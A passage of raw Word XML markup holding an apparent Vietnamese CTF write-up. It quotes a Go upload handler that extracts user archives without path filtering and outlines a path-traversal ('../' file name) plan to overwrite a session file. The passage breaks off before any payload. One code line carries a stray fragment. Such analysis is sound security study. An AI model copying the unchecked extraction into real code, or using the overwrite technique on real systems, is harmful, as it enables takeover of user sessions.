          <w:p w14:paraId="26A8263E" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BCFECAC" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t>17</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12B7354A" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t>18</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19841135" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t>19</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A94D001" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t>20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39FCA795" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t>21</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CB5C44A" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t>22</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54381775" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t>23</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06E8D5C6" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t>24</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D5DC07B" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t>25</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00AE0754" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t>26</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F5BD06C" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t>27</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70578DD5" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t>28</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69E91E79" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t>29</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F42F461" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t>30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36A600B6" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t>31</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="197606EF" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t>32</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FF4B6DE" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t>33</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A185DC1" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t>34</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23D19FAA" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t>35</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BE6FB79" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t>36</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="274A2C12" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t>37</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63898395" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t>38</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D89CB30" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t>39</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A44C509" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:lastRenderedPageBreak/>
              <w:t>func UploadEnigma(c *fiber.Ctx) error {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B47A084" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="65E5D546" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
              <w:t>user := c.Locals(</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"user"</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D33B8CB" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:t xml:space="preserve"> user == nil {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04451FD6" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:t xml:space="preserve"> utils.ErrorResponse(c, </w:t>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"User not found"</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:t>, http.StatusForbidden)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AE31148" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="241AEE5F" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="383765B0" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
              <w:t>userStruct, ok := user.(User)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4044ED19" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:t xml:space="preserve"> !ok {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F48C1F5" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:t xml:space="preserve"> c.SendStatus(http.StatusInternalServerError)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1545A0BC" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B33FFC6" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="04E8209B" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:lastRenderedPageBreak/>
              <w:tab/>
              <w:t>file, err := c.FormFile(</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"archive"</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58378D55" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:t xml:space="preserve"> err != nil {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6635EA77" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:t xml:space="preserve"> err</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D70C959" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AE92750" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4D95E295" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
              <w:t>filename := uuid.New().String() + filepath.Ext(file.Filename)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A2242A7" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5F63AFF2" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
              <w:t>tempFile := filepath.Join(</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"./uploads"</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:t>, filename)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E61C85C" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:t xml:space="preserve"> err := c.SaveFile(file, filepath.Join(</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"./uploads"</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:t>, filename)); err != nil {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5850250C" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:t xml:space="preserve"> utils.ErrorResponse(c, </w:t>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"Error saving file"</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:t>, http.StatusInternalServerError)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15AA1CF9" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A26273E" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="64BC447F" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
              <w:t>userFolder := filepath.Join(</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"./files"</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:t>, userStruct.Username)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="259CA736" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:t xml:space="preserve"> _, err := os.Stat(userFolder); os.IsNotExist(err) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05C78BC0" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:t xml:space="preserve"> err := os.MkdirAll(userFolder, 0755); err != nil {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53490304" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
              <w:t>log.Fatal(err)freading</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3305881F" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7643D4AA" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="234281EF" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="497F712F" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
              <w:t>err = archiver.Unarchive(tempFile, userFolder)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3925FD3A" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="01707C28" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:t xml:space="preserve"> err != nil {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5357B517" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:t xml:space="preserve"> err</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66CB13CA" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17C308EC" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="303A05B9" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:t xml:space="preserve"> utils.MessageResponse(c, </w:t>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"Archive uploaded and extracted successfully"</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6670F">
              <w:t>, http.StatusAccepted)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D8F2A03" w14:textId="7B7B4273" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="101D7606" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00C34835">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ADE9863" w14:textId="4C08EAC0" w:rsidR="00CA5073" w:rsidRPr="00CA5073" w:rsidRDefault="00CA5073" w:rsidP="00CA5073">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA5073">
        <w:t xml:space="preserve">Từ đoạn code có thể thấy </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5073">
        <w:t xml:space="preserve">File nén được giải nén trực tiếp vào thư mục của người dùng. Không có kiểm tra nội dung file nén, không có sandbox, không có lọc đường </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dẫn. Từ đó có thể </w:t>
      </w:r>
      <w:r w:rsidR="007038DF">
        <w:t xml:space="preserve">thực hiện </w:t>
      </w:r>
      <w:r w:rsidR="008E08E9">
        <w:t xml:space="preserve">1 vài </w:t>
      </w:r>
      <w:r w:rsidR="00DF1A80">
        <w:t>thao</w:t>
      </w:r>
      <w:r w:rsidR="008E08E9">
        <w:t xml:space="preserve"> tác để </w:t>
      </w:r>
      <w:r w:rsidR="007038DF">
        <w:t xml:space="preserve">ghi đè </w:t>
      </w:r>
      <w:r w:rsidR="008E08E9">
        <w:t>file session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487501E4" w14:textId="3888DAB2" w:rsidR="00CA5073" w:rsidRDefault="00CA5073" w:rsidP="00C34835">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34654C9F" w14:textId="5F6447B8" w:rsidR="00F02320" w:rsidRPr="00D60413" w:rsidRDefault="00F02320" w:rsidP="00C34835">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trước tiên mình sẽ </w:t>
      </w:r>
      <w:r w:rsidR="007038DF">
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>hực hiện khai thác thông qua path traversal</w:t>
      </w:r>
      <w:r w:rsidR="00FB0E08">
        <w:t xml:space="preserve"> bằng cách tạo 1 file </w:t>
      </w:r>
      <w:r w:rsidR="005401D9">
        <w:t>chứa tên chứa ../ để khi giải nén vào lưu</w:t>
      </w:r>
      <w:r w:rsidR="00DF1A80">
        <w:t xml:space="preserve"> vào một vị trí khác. </w:t>
      </w:r>
